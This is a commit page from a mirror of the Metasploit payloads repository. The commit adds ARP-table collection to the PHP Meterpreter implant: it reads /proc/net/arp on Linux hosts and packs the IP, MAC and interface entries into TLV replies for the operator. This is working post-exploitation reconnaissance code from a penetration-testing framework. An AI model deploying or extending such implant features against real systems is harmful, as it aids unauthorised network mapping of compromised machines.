github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-18 15:14:10 +01:00
Code Releases Activity

Add support for arp in php meterpreter

Browse Source 
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
This commit is contained in:
jvoisin 2024-10-01 13:32:37 +02:00
parent e0df256c81
commit ee20cc4dee
2 changed files with 36 additions and 0 deletions

32
php/meterpreter/ext_server_stdapi.php

@ -43,6 +43,7 @@ define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422); define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423); define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
define("TLV_TYPE_ARP_ENTRY", TLV_META_TYPE_GROUP | 1425);
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430); define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431); define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432); define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
@ -1266,6 +1267,37 @@ function stdapi_registry_set_value($req, &$pkt) {
} }
} }
if (!function_exists('stdapi_net_config_get_arp_table')) {
if (is_linux()) {
register_command('stdapi_net_config_get_arp_table', COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE);
}
function stdapi_net_config_get_arp_table($req, &$pkt) {
if (!is_linux()) {
return ERROR_FAILURE;
}
$content = file_get_contents('/proc/net/arp');
if ($content === false) {
return ERROR_FAILURE;
}
$lines = explode(PHP_EOL, $content);
array_shift($lines); // first line is the header of the array
foreach($lines as $line) {
if ($line == '') continue;
$v = preg_split('/\s+/', $line);
$ip = $v[0];
$mac = $v[3];
$iface = $v[5];
my_print("arp line: $ip $mac $iface");
$arp_tlv = tlv_pack(create_tlv(TLV_TYPE_IP, inet_pton($ip)));
$arp_tlv .= tlv_pack(create_tlv(TLV_TYPE_MAC_ADDRESS, pack("H*", str_replace(':', '', $mac))));
$arp_tlv .= tlv_pack(create_tlv(TLV_TYPE_MAC_NAME, $iface));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ARP_ENTRY, $arp_tlv));
}
return ERROR_SUCCESS;
}
}
if (!function_exists('stdapi_net_resolve_host')) { if (!function_exists('stdapi_net_resolve_host')) {
register_command('stdapi_net_resolve_host', COMMAND_ID_STDAPI_NET_RESOLVE_HOST); register_command('stdapi_net_resolve_host', COMMAND_ID_STDAPI_NET_RESOLVE_HOST);
function stdapi_net_resolve_host($req, &$pkt) { function stdapi_net_resolve_host($req, &$pkt) {

4
php/meterpreter/meterpreter.php

@ -269,6 +269,10 @@ function is_windows() {
return (strtoupper(substr(PHP_OS,0,3)) == "WIN"); return (strtoupper(substr(PHP_OS,0,3)) == "WIN");
} }
function is_linux() {
return (strtoupper(substr(PHP_OS,0,3)) == "LIN");
}
## ##
# Worker functions # Worker functions
## ##